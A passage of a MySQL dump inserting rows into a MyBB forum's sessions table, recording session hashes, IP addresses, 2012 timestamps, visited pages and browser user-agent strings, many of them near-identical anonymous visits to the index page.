'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('90fffd20bfdbb04f9e12db8da14214b2', '0', '94.70.23.10', '1352772831', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('94bd944de3ae7e102531128fcd0d3865', '0', '45.165.105.211', '1352772831', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('41e95ca857e844cb899d8cd03179174b', '0', '29.10.7.187', '1352772832', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3ea6f77cffd0da4e84d6cdbdebf1995e', '0', '42.99.165.140', '1352772833', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2257723336d7d0560472f2463e8b5de9', '0', '90.237.130.218', '1352772833', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('834ba124c8067187cac0b58ac3d3a765', '0', '16.164.101.133', '1352772834', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7013876b8eaba99a8ae25b88c563ad6a', '0', '38.38.245.9', '1352772835', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7899ca5bb4337ba53bb8e7348b415e51', '0', '149.198.103.81', '1352772836', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('350e78aa8eac8619c3124a05bc30495c', '0', '178.19.18.143', '1352772837', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('57a9eed11acbc69057309ebd06742afa', '0', '25.183.107.145', '1352772838', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('03b0d2c178b3475ba05996a7f1361d7c', '0', '211.200.25.245', '1352772838', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9629cfa19ad673de2aee70bae8d55175', '0', '6.231.3.6', '1352772839', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c2a17c0f8451a53be88016a25e54803a', '0', '210.161.163.59', '1352772840', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('725f22d478bd906edf28a78cfd1302b5', '0', '214.23.162.167', '1352772841', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('30e1155fb27535f6d8823df20c3c44af', '0', '115.115.14.219', '1352772842', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6d1c302af587be0afcd6508b8d819a1a', '0', '141.83.166.150', '1352772843', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c025a6a1227ce80ab47f02a886bbfc0e', '0', '238.166.237.120', '1352772844', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('93834c599e555bda7248b4aba1c8e34a', '0', '75.184.170.90', '1352772845', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1de24dd8377cfe821d146994b34d524d', '0', '52.124.85.214', '1352772869', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a3607c6b36aa4f1f19c091852c0d14d2', '0', '130.10.146.128', '1352772845', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cf87e60dba53417cf2583cc276166a6f', '0', '14.164.163.190', '1352772846', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0c1f8915697e142e060f00548fed3fe3', '0', '245.41.221.30', '1352772847', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a13c866bc315881e88dc406385f38857', '0', '183.202.72.127', '1352772847', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c64bb4df9470c050760ae2ac3af15c89', '0', '202.185.229.106', '1352772848', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b61e13cd628a721aaac3a8145b8699b0', '0', '143.8.16.220', '1352772849', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('32bb1be93abcf043badd1afca1e16fd2', '0', '50.137.144.196', '1352772849', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('64786731c6505b207494192d9343929c', '0', '135.42.151.52', '1352772850', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dae40a60b18260b7c9595dcbe33b5402', '0', '208.108.236.129', '1352772852', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('37f0a2e9c238f561a7d49b4317fc6f56', '0', '240.154.99.60', '1352772852', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('390760beb02602669a7ad0b071d08525', '0', '250.89.42.212', '1352772853', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('043e7f212bc467cd177371143b7f7513', '0', '40.205.53.166', '1352772854', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bb450ca2c55f682c0d1791b11a1e561b', '0', '225.230.248.64', '1352772854', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e8769d84cac2a6220d3361fc24f2547e', '0', '242.117.171.82', '1352772855', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2c38f4cbc30bca1d3d20b0ff4e3b451f', '0', '149.34.26.154', '1352772855', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('11121a6276c67e0a9cba21956d306dcc', '0', '87.96.88.173', '1352772857', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f8bb835e64df05f6e4921a2c72c05127', '0', '135.53.16.21', '1352772857', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d354b7555a774dd0e9f0cfe921c1d422', '0', '179.146.153.138', '1352772858', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5adbaa861fbd2a43634c3f1fbf022838', '0', '250.143.2.9', '1352772858', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('72b2a5347e364886de7504ba5565d4c2', '0', '25.164.214.13', '1352772859', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('99fd7e57262a25cd55d0940f0e62d1ee', '0', '153.30.3.158', '1352772860', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('565588ba6d9f1621269a1f5f2f292637', '0', '12.79.51.220', '1352772861', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c688ccb0c212e7c630b9096596d3e71c', '0', '248.187.187.28', '1352772862', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c51dd33b866aee230c9813307a1c4209', '0', '86.62.217.46', '1352772863', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8e27518cf88ba5e55c3e31070c5b4313', '0', '11.220.60.18', '1352772863', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('80fb8f07a79e886baff13af988d01a1e', '0', '4.83.131.90', '1352772864', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bb938f9a55e0a933dd990eccd3d2b0cf', '0', '18.239.86.26', '1352772865', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fb9b6f1b9fcc0f96e7544151e0436643', '0', '99.48.35.200', '1352772866', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cf56432047dcf1d06ac3c06a8c18f680', '0', '171.58.92.117', '1352772867', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e2a9e6b5bdbccf76d3e50f7f16e45abb', '0', '209.216.209.154', '1352772868', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ee448268641c6bb99c4411e4a3fe6845', '0', '180.182.185.180', '1352772870', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('65e9b9eaab0ed5efc36e44298e7f6517', '0', '114.48.80.78', '1352772871', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a9449f467ae1a612568e43c75f4fd25a', '0', '43.165.242.137', '1352772871', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ffae15f40cfc008dc37f8caaf4b1a592', '0', '251.73.115.40', '1352772872', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4d0a7662a0d07e033a8282ac0740e89e', '0', '64.135.24.88', '1352772872', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6638845c4bfc62d3552be9f8327c5b40', '0', '22.152.34.228', '1352772873', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7dc83594c204705b50937c56f4d59735', '0', '244.190.180.208', '1352772874', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5c98922097cffeba85ac421c4e51206f', '0', '6.153.100.147', '1352772875', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('edf2cb0264caa5a1d1a1fbcb0c6d2693', '0', '132.185.249.97', '1352772875', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9b7ac4be020446de3e05d7c29cc242f8', '0', '27.250.120.215', '1352772876', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('282b035bee97cbe5ea0c46d4c9b36a2f', '0', '109.119.205.45', '1352772878', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('beb5a01ac0c235d0924d0de5927a16e8', '0', '191.254.11.108', '1352772878', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d3ec4816583ce2999b44a444d25ac939', '0', '254.103.251.122', '1352772879', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('92aa45261cb0788f9f999c27e233b3f1', '0', '227.134.178.79', '1352772880', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5b34d565f55ecc8252086e3edd5f4e89', '0', '99.187.149.63', '1352773846', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f310d454f1fbd920b04c03f832645921', '0', '96.26.62.35', '1352773929', '/forumdisplay.php?fid=13', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '13', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f51142a0cbeedb35cba21fb9d87bfc97', '0', '105.137.136.189', '1352774746', '/showthread.php?tid=591', 'Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '21', '591'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c7cba4b7cae4619e0831d3c19602ea20', '0', '80.82.65.25', '1352775236', '/forumdisplay.php?fid=10', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari', '0', '0', '10', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b768cb8e85c7d05a0e4d51e762dc3d16', '0', '173.245.64.178', '1352781390', '/index.php?', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('088a6667a187da5e0b22d9c9c8c065c5', '0', '69.171.228.248', '1352779434', '/index.php?', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5796c6947869b1aafdf72bee72d0b8b1', '0', '91.153.21.31', '1352782877', '/index.php?', 'Go http package', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5f06a40e8d54934a9183674794ff0d5c', '0', '91.10.78.71', '1352788736', '/index.php?', 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Versi', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('be2a1edc22e1de55cdc6823194d7763b', '0', '71.99.101.141', '1352789529', '/index.php?', 'Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/17.0 Firefox/17.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('eadcd0eba459ed2012b34a3d4c9d4159', '0', '23.22.18.215', '1352782765', '/index.php?', 'Mozilla/5.0 (compatible; Windows; U; Windows NT 6.2; WOW64; en-US; rv:12.0) Gecko/20120403211507 Fir', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4cc4f83ce76d105b561f886433c71d9b', '0', '81.23.230.64', '1352787008', '/index.php?', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b0bd868f3749d9de34f335d203e81bc5', '67', '193.161.89.202', '1352811135', '/showthread.php?tid=177', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.96 Safari', '0', '0', '12', '177'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ef8c5538b1b094010b7be9b95c461140', '0', '117.198.107.3', '1352803923', '/online.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9ce8f122c67e4213234ff08789b74fa8', '62', '188.140.39.222', '1352820859', '/showthread.php?tid=1256', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '3', '1256'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('460b818f4ee659c096a4029838681179', '0', '124.179.208.227', '1352797041', '/showteam.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES 